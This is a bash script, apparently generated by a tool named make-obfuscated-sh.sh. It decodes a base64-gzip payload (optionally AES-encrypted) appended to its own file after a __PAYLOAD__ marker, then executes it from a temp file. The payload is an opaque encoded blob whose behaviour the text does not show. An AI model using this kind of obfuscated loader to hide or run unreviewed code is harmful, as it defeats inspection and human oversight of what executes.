#!/usr/bin/env bash
# Obfuscated bootstrap wrapper (temp-file exec variant)
# Generated by make-obfuscated-sh.sh
set -euo pipefail

# The generator sets OBF_ENCRYPTED accordingly; for encrypted payloads, provide OBF_PASS at runtime.
: "${OBF_ENCRYPTED:=0}"

# ---- Decoders ----
dec_b64()  { base64 -d; }
dec_gzip() { gzip -dc; }
dec_aes()  { openssl enc -aes-256-cbc -md sha256 -pbkdf2 -d -pass env:OBF_PASS; }

# Extract everything after the payload marker
extract_payload() {
  awk 'f{print} /^__PAYLOAD__$/ {f=1}' "$0"
}

# Run payload from a temp file (NOT via "bash -s")
run_payload() {
  tmp="$(mktemp)"; trap 'rm -f "$tmp"' EXIT
  if [ "${OBF_ENCRYPTED}" = "1" ]; then
    extract_payload | dec_b64 | dec_aes | dec_gzip > "$tmp"
  else
    extract_payload | dec_b64 | dec_gzip > "$tmp"
  fi
  exec /usr/bin/env bash "$tmp" "$@"
}

# Entry
OBF_ENCRYPTED=0

run_payload "$@"
exit 0

__PAYLOAD__
H4sIAAAAAAACA7VW227bOBB911dMGaW1sSspyW4f1gtnYdhyotY36NJiEQSBKtE2EYlUScppkOTf
d3RJoqbtPsUCfBE1c2Z45sxQB2+cL4w7X2K1NYwDGL7qhYDHNoz95QLcxScPf+fuIoTADaPV6wej
3wohNaxG4fnQKZV0MpHEmaNwf4PO/dPt84P6T3OLX3vh4QR5WC6m3lnkj0JvuXj9GLPl2dXE84fE
2cXVXjfOpiitLY0zvSX106k3c4fEbA0dvmMpi68aCxsdiDH3FlfRKvTm7vCvoyMArN97mDNeaqqg
Vy0pmgieqv5eSPrDBn+5DOHTaOZN9kQTW8MFENONvAkBi1M4gsu/QW8pNwAvpGFDJVgaKvaSLU2u
gbi+v/QHECSSFRpirWleaJqCFiBLDjdMb0WpQQqhbVLD0G9Mw7GxZoaRX6cMAQt4Yp7shbw/bUD8
M29xBtNoMd4Pe0jPFd1Rrnt9uGsJw6aCDBcz1NYx6SzmaoNLJ92lVA/NXhprCuS3w3+tw9w6TOHw
fHA4HxwGpF9b1l8H8FkyNEOKG881y2hDbbIVQC7MVF/ChVkHvgQTYxE4PW1JrpROfgoW3CqsHnwQ
peSI2sN73FO/NVtJJtDydgCMrwWshQRVJglV6negUtYL65hlpaSqs6uidRuSUlFpV75N9FZsdZIE
awFk7HuhNx7NCFzC/f3Lp7XQyHeCrK4X+JhJA4/y+pVma709+hH8XxFkPOxFee9tmI+8BYzP3fHH
1w+AiON6TzibY3lb9RbWkCe06uU3kIg8j3kK1g6aiWapnMHbU3BSunN4mWXft3ej324lSMevjZEz
pRjf2DCRbIfcZuyaZrdQcsaVjrOMpj82+gH4OAwwVJOusYzCVRSi3jvw1gxOTt8e940gHIVRMDT/
MZqJZDYLYNGvLybSAViWBUE0HrtB8NTio8nEncC567vV49Yw3DKFfPA1k7mqM1HNyJIxh4qjauls
FQGarRmn9ktOvMV0iXyc10dCy/oqVoqmg9ovrdlQEEsKoqAy1kxgG3W5ODJopmgn8+nIm0WYJmbu
jZ+S7QRtRU+qAE3IKbYYMgxuBTgWKR088kN+5exKib25LHVRarRuuMdB2+QRFZrlj3WplqLVVeDi
gTzBEvSSWINTSJE4ZWN3D/HNNby7w/7BGPjpmcf9h3d9o9vUzxB4jmSYivl8ev7Ywp2UP4/8BZYQ
kw6orMTVRsWiCI4iM++eoR+UXZ2/LC9zkPRryWRVCvPuORRakJ9F6cjbp1/wZILgo7daoWhwChay
scJJheA4GTMhig5Oq+p2xrQktjAzsWHJ/zSTh4AMhcE3oJphKxvH6rTEt4dqxx0t2XYbV93yBrZ+
E3PUttSpuOFgSeDi5nEXFWxa1qMc3ygn3qjGamcyqfrwP1LHE/zSCgAA

